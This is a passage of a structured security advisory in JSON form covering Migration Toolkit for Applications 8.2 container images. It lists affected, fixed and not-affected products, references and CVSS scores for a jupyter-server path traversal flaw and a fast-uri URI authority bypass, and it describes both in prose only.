"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-5422"
},
{
"category": "external",
"summary": "RHBZ#2484037",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2484037"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-5422",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-5422"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-5422",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5422"
},
{
"category": "external",
"summary": "https://huntr.com/bounties/24a36953-6490-466f-8cb2-a90d1ca56e0f",
"url": "https://huntr.com/bounties/24a36953-6490-466f-8cb2-a90d1ca56e0f"
}
],
"release_date": "2026-06-02T09:11:15.755000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-21T22:10:10+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:43038"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "jupyter-server: jupyter-server: Sensitive data exposure via path traversal vulnerability"
},
{
"cve": "CVE-2026-6322",
"cwe": {
"id": "CWE-140",
"name": "Improper Neutralization of Delimiters"
},
"discovery_date": "2026-05-05T11:01:00.332189+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2466684"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in fast-uri. A remote attacker could exploit this vulnerability by crafting a malicious Uniform Resource Identifier (URI) that contains percent-encoded authority delimiters. The fast-uri library incorrectly decodes these delimiters during normalization and then re-emits them as raw separators, which can change the URI\u0027s intended authority. This issue allows applications that perform host allowlist checks, redirect validation, or outbound request routing to be steered to a different authority than specified, potentially bypassing security controls.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "fast-uri: fast-uri: URI authority bypass due to improper delimiter handling",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This Important flaw in the `fast-uri` library allows an attacker to bypass security controls in Red Hat products that process Uniform Resource Identifiers (URIs). By crafting a malicious URI with percent-encoded authority delimiters, an attacker can cause the library to incorrectly interpret the URI\u0027s authority, potentially redirecting applications to an unintended domain. This could lead to a bypass of host allowlist checks, redirect validation, or outbound request routing.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64"
],
"known_not_affected": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-6322"
},
{
"category": "external",
"summary": "RHBZ#2466684",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2466684"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-6322",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-6322"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-6322",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6322"
},
{
"category": "external",
"summary": "https://cna.openjsf.org/security-advisories.html",
"url": "https://cna.openjsf.org/security-advisories.html"
},
{
"category": "external",
"summary": "https://github.com/fastify/fast-uri/security/advisories/GHSA-v39h-62p7-jpjc",
"url": "https://github.com/fastify/fast-uri/security/advisories/GHSA-v39h-62p7-jpjc"
}
],
"release_date": "2026-05-05T10:29:16.378000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-21T22:10:10+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:43038"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
